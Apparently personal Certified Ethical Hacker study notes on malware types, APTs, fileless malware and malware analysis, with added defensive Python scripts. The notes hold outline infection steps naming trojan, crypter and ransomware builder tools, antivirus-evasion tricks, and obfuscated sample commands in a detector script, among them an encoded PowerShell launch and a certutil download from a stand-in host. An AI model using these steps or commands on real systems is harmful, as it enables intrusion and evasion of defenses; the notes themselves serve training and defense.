Malware components:

  • Crypter - conceals the existence of malware
  • Downloader - downloads other malware or malicious files
  • Dropper - covert carrier of malware
  • Exploit - part of malware that takes advantage of a vulnerability or bug
  • Injector - injects exploits or malicious code available in the malware into other processes
  • Obfuscator - conceals malicious code
  • Packer - compresses malware, turning the code into an unreadable format
  • Payload - performs the desired activity when activated
  • Malicious code - piece of code that defines the basic functionality of the malware

Potentially unwanted applications (PUAs)

  • grayware/junkware
  • Adware
  • Torrent
  • Marketing
  • Cryptomining
  • Dialers

Advanced Persistent Threats (APT):

Attacker remains undetected for long periods of time

Characteristics of APT:

  • Objectives - repeatedly obtain information
  • Timeliness - time taken from finding the vulnerability to gaining and maintaining access
  • Resources - amount of knowledge and tools required to perform the attack
  • Risk tolerance - level to which attacks remain undetected
  • Skills and methods - methods and tools used by the attacker
  • Actions - APT attacks follow a certain number of actions
  • Attack origination points - refers to the numerous attempts made to gain entry
  • Numbers involved in attack - number of host systems involved in the attack
  • Knowledge source - gathering information online about specific threats
  • Multi-phased - multiple phases of attack
  • Tailored to vulnerabilities - !
  • Multiple points of entry - after the initial entry, multiple others are created
  • Evasion of signature-based IDSs - closely related to zero-days
  • Specific warning signs - almost impossible to detect; usually just suspicious activity from users, file uploads etc.
  • Highly targeted - not random; planned and executed against specific targets
  • Long-term engagement - aim for long-term presence
  • Advanced techniques - sophisticated malware, code detection, spear phishing, zero-days
  • Complex command and control infrastructure

APT life-cycle:

  1. Preparation - defines target, research, team organization
  2. Initial intrusion - spear-phishing, running exploits
  3. Expansion - expanding access to the target's network, admin and privilege escalation
  4. Persistence - maintaining access, evading IDS and firewalls.
  5. Search and exfiltration - attacker achieves the ultimate goal of network exploitation, steals all data etc. Destroy DLP
  6. Cleanup - covers tracks.

Trojans

Trojan - malicious or harmful code hidden in an apparently harmless program or data. Works at the same privilege level as the user.

Indications of a trojan - screen blinks, default wallpaper or settings change automatically, printers automatically start printing etc. (like 50 other things in the CEH resource)

Ports used by trojans:

  • common and uncommon ports; some use ports like 443

Types of trojans:

  • Remote access (RAT) - Remcos RAT spreading via virtual disk .vhd files

  • Backdoor trojans - can bypass IDS and firewalls, usually second or third point of entry. TinyTurla-NG (TTNG) operated by Turla APT group. Attackers utilize compromised WordPress-based websites as C2 endpoints.

  • Botnet trojans - used to infect large number of computers, connects to attacker using IRC channels, some have worm features. RDDoS is a botnet capable of executing commands and performing DDoS attacks.

  • Rootkit trojans - cannot be detected by observing services, usually part of blended attacks - dropper, loader and rootkit. Reptile rootkit

  • E-banking trojans - capture the victim's account information before the bank encrypts it. TAN grabber (transaction authentication number), HTML injection (fake form field), Form grabber (POST requests), Covert credential grabber (silent until the user performs an online transaction)
    • e-banking trojan - CHAVECLOAK
  • Point-of-Sale Trojans - target credit/debit card readers. Prilex POS - Brazilian, EMV cryptograms that allow attackers to use ghost transactions.

  • Defacement trojans - physically change underlying HTML format, Restorator - utility for editing windows resources.

  • Service protocol trojans - VNC, HTTP/HTTPS and ICMP. VNC trojans start a hidden VNC daemon; known financial malware uses this - Vultur, Dridex and Gozi. HTTP/HTTPS trojans bypass firewalls and work in reverse, use port 80, pose as a legitimate webshell and cover it in Base64. SHTTPD - small server that can be embedded in any program, listens on port 443. HTTP RAT uses port 80 to gain access/establish an HTTP tunnel. ICMP trojans use request and reply packets to carry the payload.

  • Mobile trojans - target phones, Chameleon a banking trojan distributed by phishing pages, exploits Accessibility service privileges.

  • IoT trojans - leverage botnets to attack machines outside the IoT network. OpenSSH trojan - installs a cryptomining trojan using a tampered version of OpenSSH.

  • Security Software disable trojans - stop the working of security programs such as firewalls to allow next stage of attack. Chameleon, CertLock, GhostLock

  • Destructive trojans - delete files on the system

  • DDoS Trojans - systems stand by for a command from the server. The Mirai IoT botnet trojan is still the most notorious DDoS trojan. Others: RDDoS, Harabot, hailBot, kiraiBot, catDDoS

  • Command shell trojans - provide remote control of a command shell on the victim's machine - netcat, DNSMessenger, GCat are some command shell trojans.

How to infect system using trojan:

  • Create new trojan packet using njRAT
  • Create a dropper or downloader - Amadey or SecuriDropper
  • Employ a wrapper such as IExpress wizard to bind Trojan to legitimate files for installation
  • Employ crypter such as Attack-Crypter to encrypt trojan and evade IDS, antivirus etc
  • Deploy trojan on the victim's machine by executing the dropper or downloader software
  • Execute the damage routine

Creating a trojan:

  • njRAT - data stealing, camera access, keylogger etc, control botnets.
  • THorse
  • THOSE RAT
  • Trojan horse construction kit
  • Senna spy trojan generator
  • Umbra loader - botnet trojan maker
  • VenomRAT

Employing a dropper - used to camouflage malware payloads

  • Amadey, SecuriDropper, PindOS JavaScript dropper, SharkBot, Dropper.AIF, NullMixer
  • Downloaders - a new, unknown downloader can bypass antivirus.
    • Fruity trojan downloader, Downloader.DN, InfoStealer.XY and sLoad

Employing a wrapper:

  • binds the trojan executable with .exe applications that appear genuine. Installs the trojan in the background and runs the application in the foreground.
    • Covert wrapper programs - IExpress wizard, GULoader, RDP Wrapper, SystemBC, Trickbot, FinFisher

Employing a crypter - encrypts original binary code of .exe, used to hide viruses, spyware, keyloggers etc.

  • Attack-crypter, Muck crypter, Pure Crypter, DarkTortilla, Line Crypter, Trickbot/Conti

Propagating and deploying a trojan - email, covert channels, proxy servers, USB/flash drives.

Evading antivirus software -

  • Break trojan into multiple pieces and zip them
  • embed into application
  • Change syntax - exe to VB script or ppt, doc, pdf
  • Change content using HEX editor
  • Change checksum and encrypt the file
  • Never use trojans downloaded from web
  • use binder and splitter that can change first few bytes of trojan programs

Exploit kits - use security loopholes found in software applications such as Adobe Reader and Adobe Flash Player.

  • BotenaGo - written in Go, contains over 30 variants of exploits and is capable of attacking millions of IoT and routing devices. Also called Mirai botnet.
    • Uses port 31412 by sending GET requests and listens on port 19412
    • no active communication with C2 during exploitation
    • Exploits based on exploitation function mapping
    • Exploits up to 33 vulnerabilities
    • Launches Mirai malware on the device through links

Virus and worm concepts

Virus - self-replicating program that reproduces by attaching copies of itself to other programs. Affects a variety of files: .OVL, .EXE, .COM, .BAT

Characteristics of viruses:

  • infects other programs
  • Transforms itself
  • Encrypts itself
  • Alters data
  • Corrupts files and programs
  • Replicates itself

Why create a virus?

  • inflict damage on competitors
  • financial benefits
  • vandalize intellectual property
  • pranks
  • research
  • cyber-terrorism
  • political messages
  • damage network or computers
  • gain remote access

Indications of virus:

  • BSOD
  • missing files etc.
  • you’ll know :)

Stages of virus lifecycle:

  • Design - code or construction kits
  • Replication - replicates within system then spreads itself
  • Launch - activated when user performs specific actions

Working of viruses:

  • Infection phase
    • Method of infection
    • Method of spreading

A virus infects a system in sequence:

  • loads itself into memory
  • appends malicious code to a legitimate program
  • user launches the program
  • execution affects other programs in the system
  • cycle continues until the user notices an anomaly in the system
  • boot sector viruses execute code before the PC is booted

Methods a virus spreads:

  • files
  • file sharing
  • USB and other storage media
  • malicious downloads, attachments

Attack phase:

  • Delete files and alter content of data
  • Perform tasks not related to applications
  • execute upon triggering of a specific event
  • some execute via bug programs built into memory
  • advanced viruses only after spreading through the host

Types of viruses:

  • Boot sector virus - master boot record and DOS boot record, OS executes code while booting
  • File viruses - in files
  • Multipartite viruses - combines file infections and boot record infectors
  • Macro viruses - word or similar applications, most are written in VBA, usually spread via email
  • Cluster viruses - don't spread or plant additional files. DIR-2
  • Stealth viruses - try to hide from the antivirus program by intercepting service calls. One of their carriers is a rootkit.
  • Encryption viruses - cryptolockers, via freeware or shareware, employ XOR on each byte with a randomized key. Encryption viruses block access to the machine or provide limited use.
  • Sparse infector virus - replicates occasionally (every tenth execution), determines which file to infect.
  • Polymorphic viruses - change their code to avoid detection, but save same functionality.
  • Metamorphic virus - rewrite themselves completely each time they infect new file to avoid pattern recognition
  • Overwriting file or cavity viruses - overwrite part of the host file with a constant (usually nulls). Maintaining a constant file size allows them to avoid detection.
  • Companion/Camouflage viruses - Stores itself with same filename as the target program.
  • Shell viruses - form a shell around the target host, making itself the original program with the host code as a sub-routine
  • File extension Viruses - badfile.txt.vbf etc.
  • FAT viruses - attacks file allocation table FAT
  • Logic bomb viruses - triggered to a response to an event or time/date
  • Web scripting viruses - breach web browser security through a website. Prevention - safely validating untrusted HTML inputs.
  • E-mail viruses - attachments
  • Armored viruses - shows other location to antivirus, anti-disassembly, anti-debugging, Anti-heuristics, anti-emulation, anti-goat.
  • Add-on viruses - append code without making any changes
  • Intrusive viruses - overwrite code completely
  • Direct action or transient viruses - transfer all code to host code in memory
  • Terminate and stay resident viruses (TSR) - remain permanently in the target's machine.

How to infect machine using a virus -

  1. create a virus using JPS virus maker, Virus maker, Virus-builder.
  2. Pack it with binder or virus packager tool
  3. Send to victim's machine. TeraBIT virus maker, Batch virus generator

Virus hoaxes - false alarms claiming to be real viruses

Fake antivirus - Antivirus 10, AVLab Internet Security, Smart Security, PC Analyzer Tool, Live Protection Suite

Ransomware

Ransomware families:

  • Phobos
  • Xorist
  • LockBit Black
  • Darkside RaaS
  • Conti
  • Cerber
  • Thanos
  • RansomEXX
  • NETWALKER
  • QNAPCrypt

Ransomware examples -

  • Mallox ransomware - targets MS Windows systems (MS-SQL servers), appends .mallox to files, creates a ransom note called "recovery information.txt"
  • STOP/Djvu ransomware - evolved to over 600 variants. Adds the .Djvu extension, which is a legitimate extension used by AT&T. Uses RSA encryption

How to infect system using ransomware -

    1. Chaos ransomware builder v4.
    2. Transfer to victim's machine
    3. Ransomware encrypts victim's machine
    4. window appears with ransom instructions

Computer worms

Spread, replicate and execute on their own:

  • SSH-Snake
  • Raspberry Robin
  • P2PInfect

How to infect system using worm:

  • Create with tools such as internet worm maker thing, batch worm generator.
  • Deploy worm via phishing emails, malicious websites, network shares or infected USB drives. Use crypters such as BitCrypter, H-Crypt, encrypt worm to evade detection.
  • Worm infects system by executing its payload
  • Worm scans other vulnerable devices
  • Copies itself to other machines and propagates
  • Installs backdoors or alters system settings and steals data from infected devices

Worm makers-

  • Internet worm thing, open source tool
  • Batch worm generator

Fileless malware concepts

Also called non-malware; infects legitimate software and applications and leverages existing vulnerabilities to infect the system. Generally resides in RAM. Usually injects code into JS, MS Word, Adobe PDF Reader, PowerShell, .NET, malicious macros and Windows Management Instrumentation (WMI)

Reasons to use:

  • stealth - really difficult to detect
  • LOL (living off the land) - system tools exploited by fileless malware installed on system by default. No need for custom tool installation
  • Trustworthy - most frequently used and trusted tools.
  • Persistence without files - fileless malware can achieve persistence by inserting code in the registry or scheduling tasks.
  • Simplifying the infection process - begins with a simple phishing email leading to a website that executes code directly in memory
  • Increased success rate in targeted attacks
  • Complicated forensic analysis - hard to develop indicators of compromise (IoCs)

Techniques used by attackers:

  • Phishing
  • Legit applications
  • Native applications
  • Through lateral movement
  • Malicious websites
  • Registry manipulation
  • Memory code injection
  • Script-based injection
  • Reflective DLL injection
  • Exploiting non-malicious files

Categorization by how much evidence is left in machine:

  • Type 1: No file activity performed - never requires writing file on disk. Example - infecting by sending malicious packets that exploit vulnerability.
  • Type 2: Indirect file activity - achieves fileless presence using files, e.g. injecting a malicious PowerShell command into the WMI repository
  • Type 3: Required file to operate - requires files to operate, but does not execute attacks from those files directly.

Categorization by point of entry:

  • Exploits can be either file-based or network-based. File-based exploits use system executables (Flash, Java, document readers etc.) to run shellcode and inject the payload into memory
  • Hardware - Device based malware infects firmware residing on network cards or hard drives to deliver malicious payload.
  • Execution and injection - can be file-based, macro-based, disk-based. Inject code into process memory or other legitimate running processes.

Point of entry:

  • memory exploits
  • website
  • email, documents

EternalBlue: memory exploit that leverages flaws in the Windows file-sharing protocol (SMB), giving read access to services, applications etc. Then targets the Local Security Authority Subsystem Service (lsass.exe) - mimikatz

Popular fileless malware -

  • LODEINFO - starts with phishing emails carrying MS Word documents; a VBA script launches shellcode capable of loading the LODEINFO implant. Masquerades as privacy-enhanced mail (PEM) from the C2 server, which in turn loads the backdoor directly into memory.
  • Fileless Revenge RAT
  • Divergent
  • DarkWatchman
  • HeadCrab 2.0
  • BazarBackdoor
  • Nodersok
  • Vaporworm
  • Sodinokibi Ransomware
  • Kovter and Poweliks
  • Dridex
  • Sorebrect Ransomware

Fileless malware obfuscation methods to avoid antivirus

  • Inserting characters such as commas and semicolons (whitespace characters)
  • Inserting parentheses
  • Inserting caret symbols (^)
  • Inserting double quotes
  • Using custom environment variables
  • Using pre-assigned environment variables
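As an added example (not from the original notes), the following Python script reverses the cmd.exe obfuscation tricks listed above (carets, inserted quotes, comma/semicolon delimiters, parentheses, custom and pre-assigned environment variable slicing) so that a defender can see the real command and score how many tricks were stacked. The sample command lines, the preset variable values and the list of suspicious tokens are constructed assumptions.

```python
import re

# Constructed values for pre-assigned Windows environment variables that
# obfuscated commands slice with %VAR:~start,len% (assumed default install paths).
PRESET_ENV = {
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
    "PUBLIC": r"C:\Users\Public",
    "PROGRAMFILES": r"C:\Program Files",
}
# Keywords worth alerting on once the obfuscation layer is peeled away (assumed list).
SUSPICIOUS_TOKENS = ("powershell", "certutil", "mshta", "rundll32", "wmic", "-enc")

ENV_REF = re.compile(r"%(\w+)(?::~(-?\d+)(?:,(-?\d+))?)?%")
SET_CMD = re.compile(r'\bset\s+"?(\w+)=([^"&]*)"?', re.IGNORECASE)


def expand_env(text, env):
    """Expand %VAR% and %VAR:~start,len% using cmd.exe substring semantics."""
    def repl(match):
        name, start, length = match.group(1).upper(), match.group(2), match.group(3)
        value = env.get(name)
        if value is None:
            return match.group(0)            # unknown variable: leave untouched
        if start is None:
            return value
        s = int(start)
        s = s if s >= 0 else max(len(value) + s, 0)   # negative start counts from the end
        if length is None:
            return value[s:]
        n = int(length)
        end = s + n if n >= 0 else len(value) + n     # negative length trims from the end
        return value[s:end]
    return ENV_REF.sub(repl, text)


def analyze(cmdline):
    """Normalize one command line and report which obfuscation techniques it used."""
    env = dict(PRESET_ENV)
    techniques = {}
    custom = SET_CMD.findall(cmdline)
    for name, value in custom:                   # custom variables: set "a=pow" ... %a%
        env[name.upper()] = value
    if custom:
        techniques["custom_env_vars"] = len(custom)
    refs = [m for m in ENV_REF.finditer(cmdline) if m.group(2) is not None]
    if refs:
        techniques["preset_env_slicing"] = len(refs)
    for key, chars in (("carets", "^"), ("double_quotes", '"'),
                       ("delimiters", ",;"), ("parentheses", "()")):
        count = sum(cmdline.count(c) for c in chars)
        if count:
            techniques[key] = count
    text = expand_env(cmdline, env)
    text = text.replace("^", "")        # caret escapes the next char; dropping it yields the real text
    text = text.replace('"', "")        # "ca""lc" is still calc once the quotes are gone
    text = re.sub(r"[,;]+", " ", text)  # cmd treats commas/semicolons as argument delimiters
    text = re.sub(r"[()]", "", text)
    text = re.sub(r"\s+", " ", text).strip()
    suspicious = [t for t in SUSPICIOUS_TOKENS if t in text.lower()]
    return {
        "normalized": text,
        "techniques": techniques,
        "suspicious_tokens": suspicious,
        # any obfuscation around a sensitive tool, or two or more tricks stacked, is worth an alert
        "flagged": bool(suspicious and techniques) or len(techniques) >= 2,
    }


# Constructed command lines, not captured from a real host.
SAMPLE_LINES = [
    'cmd.exe /c "po^w^e^r^s^h^e^l^l -nop -w hidden -enc AAAA"',
    'cmd,/c;"ca""lc".exe',
    'cmd /c %COMSPEC:~0,1%ertutil -urlcache -f http://example.invalid/x.txt x.txt',
    'cmd.exe /c set "a=pow" && set "b=ershell" && call %a%%b% -nop',
    r'notepad.exe C:\Users\user\notes.txt',
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(analyze(line))
```

The normalized text is what a process-creation rule should match against; the raw command line is what the obfuscation was designed to get past.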

AI based malware concepts

Autonomous

  • Infiltration - same as other malware

Natural language processing (NLP) in AI-based malware - sophisticated phishing attacks, context-aware malware, automated social engineering, sentiment analysis targeting, evasion techniques

Generative Adversarial Networks (GANs)

AI-based malware - FakeGPT, uses a Chrome extension that mimics ChatGPT

WormGPT - generates human-like responses for emails etc. FraudGPT - similar, can create cracking tools

BlackMamba - AI-generated polymorphic malware, leverages an LLM

Malware analysis

Sheep Dip: analysis of suspicious files, messages etc.

Static analysis:

  • Code analysis - involves going through the executable or binary code
    • File fingerprinting - HashMyFiles
    • Local and online malware scanning - VirusTotal, Hybrid Analysis
    • Performing strings search - analyze embedded strings - BinText, FLOSS, Strings, Free EXE DLL Resource Extract, FileSeek, Hex Workshop
    • Identifying packing/obfuscation methods - PEiD, Detect It Easy (DIE)
    • Finding portable executables (PE) - PE Explorer, used on Windows; a PE contains .text, .rdata, .data, .rsrc
    • Identifying file dependencies - check the dynamically linked list in the malware executable file - Dependency-Check, DependencyFinder, Dependency Walker (lists all the dependent modules)
    • Disassembly - disassemble binary code to analyze assembly instructions - IDA / IDA Pro, OllyDbg, Ghidra, x64dbg, Radare2, WinDbg
    • Analyzing ELF executable files - readelf
    • Analyzing Mach object (Mach-O) executable files, associated with macOS and iOS - LIEF, otool, Hopper Disassembler
    • Analyzing malicious MS Office documents - OLE2 files, oleid tool, identifying suspicious VBA keywords. !!! - good idea for work
    • Finding macro streams -
    • Analyzing suspicious PDF documents - PDFiD, PDFStreamDumper
    • Analyzing suspicious documents using YARA - for malware samples

| Area | Goal | What to Look For | Tools / Commands |
|---|---|---|---|
| Code / Binary analysis | Understand what the executable is and what it likely does without running it | File type, architecture, compiler hints, stripped symbols, suspicious sections | file (Linux), PE Explorer / CFF Explorer (Windows), Hex Workshop |
| File fingerprinting | Create stable identifiers (IOCs) for tracking & correlation | MD5/SHA1/SHA256 hashes; compare with known samples | HashMyFiles; sha256sum (Linux) |
| Local & online malware scanning | Quick triage using multiple engines / sandboxes | Detection names, behavioral tags, contacted domains, dropped files | VirusTotal; Hybrid Analysis |
| Strings search | Extract embedded text to find IOCs & intent | URLs, IPs, commands, file paths, mutex names, registry paths, PowerShell, user-agent strings | FLOSS; strings; BinText; FileSeek; Free EXE/DLL Resource Extract; Hex Workshop |
| Packing / obfuscation detection | Detect if code is compressed/encrypted/hidden | High entropy, tiny import table, unusual sections, UPX markers | PEiD; Detect It Easy (DIE) |
| PE discovery & PE structure (Windows) | Identify Windows executables & key sections | PE sections: .text (code), .rdata (read-only), .data (globals), .rsrc (resources) | PE Explorer (Windows) |
| Dependency analysis (imports) | See what libraries/APIs the binary relies on | Suspicious imports: networking, process injection, crypto, persistence | Dependency Walker; DependencyFinder; Dependency-Check |
| Disassembly (static reversing) | Convert machine code to assembly/pseudocode to understand logic | C2 logic, encryption routines, persistence, privilege escalation, anti-analysis | Ghidra; IDA / IDA Pro; x64dbg; OllyDbg; WinDbg; Radare2 |
| ELF analysis (Linux) | Inspect Linux malware binaries | Entry point, segments, dynamic linker, imports, RWX segments | readelf; objdump; nm; ldd; checksec |
| Mach-O analysis (macOS/iOS) | Inspect Apple binaries | Load commands, embedded libs, entitlements, suspicious dylibs | otool; LIEF; Hopper Disassembler |
| Malicious MS Office docs (OLE2) | Detect macro-based malware & embedded objects | Auto-exec macros, suspicious VBA keywords, embedded payloads | oleid; (enrich) olevba; oledump |
| Macro streams | Extract and review macro code streams | VBA streams, AutoOpen/Document_Open, shell calls | oledump; olevba |
| Suspicious PDF analysis | Identify malicious PDF objects/scripts | /JavaScript, /OpenAction, suspicious streams | PDFiD; PDF Stream Dumper |
| YARA scanning (docs & binaries) | Match known malware families/patterns | Rule hits, family classification, packer IDs | YARA (local rules + community rulesets) |

Dynamic analysis - behavioral analysis, executing malware

  • System baselining - capturing system state (taking snapshot)
  • Host integrity monitoring - study changes
    • Port monitoring - netstat and TCPView
    • netstat commands:
      • -a all active TCP communications
      • -e Displays ethernet statistics
      • -n active TCP connections
      • -o: active connections and the owning PID
      • -p: protocol - shows connections for protocol.
      • -s: Displays statistics by protocol.
      • -r: Displays contents for ip routing table
    • process monitoring - Process Explorer, OpManager
    • registry monitoring - Run, RunServices, RunOnce, RunServicesOnce, jv16 PowerTools
    • windows services - malware sometimes renames services, Netwrix, AnVir Task Manager
    • startup apps - WinPatrol
    • Event logs - Splunk SIEM
    • Monitoring - Mirekusoft Install Monitor
    • files and folders - PA File Sight
    • Device drivers monitoring - msinfo32, DriverView
    • Network traffic monitoring/analysis - SolarWinds NetFlow, Capsa
    • DNS resolution - DNSChanger, DNSQuerySniffer
    • API calls monitoring - API Monitor
    • System calls monitor - strace
    • scheduled tasks monitoring - time or action based, logic bombs - schtasks, ADAudit Plus
    • Browser activity monitoring - Wireshark on ports 443, 80, 8080 to check if anything is connecting to C2

| Area | Goal | What to Look For | Tools / Commands |
|---|---|---|---|
| System baselining | Capture "known-good" state before execution | Snapshot/restore points, baseline processes/services/files | VM snapshots (VirtualBox/VMware); (enrich) Regshot for registry baseline |
| Host integrity monitoring | Detect system changes caused by malware | New/changed files, registry keys, services, tasks, drivers | Install Monitor tools; Sysmon/SIEM (if available) |
| Port / connection monitoring | Identify active connections and potential C2 | Unknown outbound connections, unusual ports, frequent beacons | netstat; TCPView |
| netstat: -a | Show all connections and listening ports | Hidden listeners, unexpected services | netstat -a |
| netstat: -e | Ethernet statistics | Anomalous traffic volume | netstat -e |
| netstat: -n | Numeric addresses (no DNS resolve) | Quick IP review (faster, cleaner) | netstat -n |
| netstat: -o | Show PID owning the connection | Map network activity → process | netstat -o |
| netstat: -p | Filter by protocol | TCP vs UDP focus | netstat -p tcp (example) |
| netstat: -s | Protocol statistics | Spikes in errors/retransmits | netstat -s |
| netstat: -r | Routing table | Suspicious route changes | netstat -r |
| Process monitoring | Track spawned/injected processes | Unusual parent-child chains, LOLBins, unsigned processes | Process Explorer; OpManager |
| Registry monitoring (persistence) | Detect autoruns & persistence changes | Run/RunOnce keys; Services keys; unusual new entries | jv16 PowerTools; (enrich) Autoruns; Regshot |
| Windows services monitoring | Spot new/renamed services | Random names, hidden services, changed service paths | Netwrix; AnVir Task Manager |
| Startup apps monitoring | Detect persistence via startup entries | Unexpected startup items | WinPatrol |
| Event log monitoring | Observe security/system events during execution | Service creation, task creation, log clearing | Splunk SIEM (or Windows Event Viewer) |
| Install/changes monitoring | Track installer-like behavior & system modifications | Dropped files, added registry keys, created services | Mirekusoft Install Monitor |
| File/folder monitoring | Detect file writes & drops | AppData/Temp drops, staging folders, encryption activity | PA File Sight |
| Driver monitoring | Detect kernel-level components | New drivers, unsigned drivers | msinfo32; DriverView |
| Network traffic analysis | Deep inspection of traffic content/flows | DNS beacons, HTTP/S C2, strange TLS, payload downloads | SolarWinds NetFlow; Capsa; (enrich) Wireshark |
| DNS resolution monitoring | Identify domains queried during execution | DGA-like domains, frequent lookups, new domains | DNSQuerySniffer; DNSChanger |
| API calls monitoring (Windows) | Observe Windows API usage for behavior mapping | CreateRemoteThread, VirtualAlloc, WinInet, registry APIs | API Monitor |
| System call monitoring (Linux) | Trace OS calls for Linux malware | File/exec/network syscalls | strace |
| Scheduled tasks monitoring | Detect time-based persistence/logic bombs | New tasks, odd triggers, hidden tasks | schtasks; ADAudit Plus |
| Browser / web activity monitoring | Check common C2 ports & web beacons | 80/443/8080 traffic to unknown hosts | Wireshark filtering ports 80,443,8080 |
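Added example (not part of the notes): a Python triage of `netstat -ano` output that maps each connection to its owning PID, as the -o row describes, and flags listeners and outbound connections from processes that a baseline says should never use the network, calling out the 80/443/8080 web ports the browser-monitoring row singles out. The netstat output, the PID-to-image map and the no-network baseline are all constructed assumptions.

```python
import re
from collections import Counter

# Constructed `netstat -ano` output in the Windows layout; not captured from a real host.
NETSTAT_OUTPUT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:5555           0.0.0.0:0              LISTENING       5120
  TCP    10.0.0.5:49712         203.0.113.10:443       ESTABLISHED     3324
  TCP    10.0.0.5:49730         203.0.113.10:443       ESTABLISHED     5120
  TCP    10.0.0.5:49731         203.0.113.10:443       TIME_WAIT       0
  TCP    10.0.0.5:49740         198.51.100.7:4443      ESTABLISHED     5120
  UDP    0.0.0.0:5353           *:*                                    1480
"""
# Constructed PID -> image map, as `tasklist` would report it on the same host.
PROCESSES = {0: "System Idle Process", 912: "svchost.exe", 1480: "svchost.exe",
             3324: "chrome.exe", 5120: "notepad.exe"}
# Assumed baseline: images that should never listen on or talk to the network.
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe"}
WEB_PORTS = {80, 443, 8080}   # the ports the notes single out for browser/C2 monitoring

ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")


def split_endpoint(endpoint):
    """'203.0.113.10:443' -> ('203.0.113.10', 443); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Turn the netstat table into dicts; header and blank lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        proto, local, remote, state, pid = m.groups()
        lhost, lport = split_endpoint(local)
        rhost, rport = split_endpoint(remote)
        conns.append({"proto": proto, "lhost": lhost, "lport": lport, "rhost": rhost,
                      "rport": rport, "state": state or "", "pid": int(pid)})
    return conns


def triage(text, processes):
    """Return (findings, per-remote-host connection counts)."""
    conns = parse_netstat(text)
    findings = []
    for c in conns:
        image = processes.get(c["pid"], "unknown")
        if image not in NO_NETWORK_EXPECTED:
            continue            # baseline says this image may use the network
        if c["state"] == "LISTENING":
            findings.append((c["pid"], image,
                             f"unexpected listener on {c['proto']} port {c['lport']}"))
        elif c["state"] == "ESTABLISHED":
            kind = ("a web port (possible HTTP/S C2)" if c["rport"] in WEB_PORTS
                    else "a non-standard port")
            findings.append((c["pid"], image,
                             f"outbound to {c['rhost']}:{c['rport']} over {kind}"))
    # many short-lived sockets to one remote host (incl. TIME_WAIT leftovers) hint at beaconing
    repeats = Counter(c["rhost"] for c in conns if c["rhost"] not in ("0.0.0.0", "*"))
    return findings, repeats


if __name__ == "__main__":
    found, counts = triage(NETSTAT_OUTPUT, PROCESSES)
    for f in found:
        print(f)
    print(counts.most_common(3))
```

Running this on successive snapshots (netstat -ano in a loop) turns the one-shot repeat counter into a beacon-interval estimate.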

Virus detection methods:

  • scanning - yes
  • integrity checking
  • interception - deflect and flag logic bombs and trojans
  • Code emulation
  • Heuristic analysis - SCEMU

Malware code instrumentation - inserting additional code within the binary code - HawkEye

Trojan analysis - Coyote

  • initial access
  • deployment and infection
  • exploitation
  • persistence
  • c2

Virus analysis: GhostLocker 2.0

Fileless malware analysis: PyLoose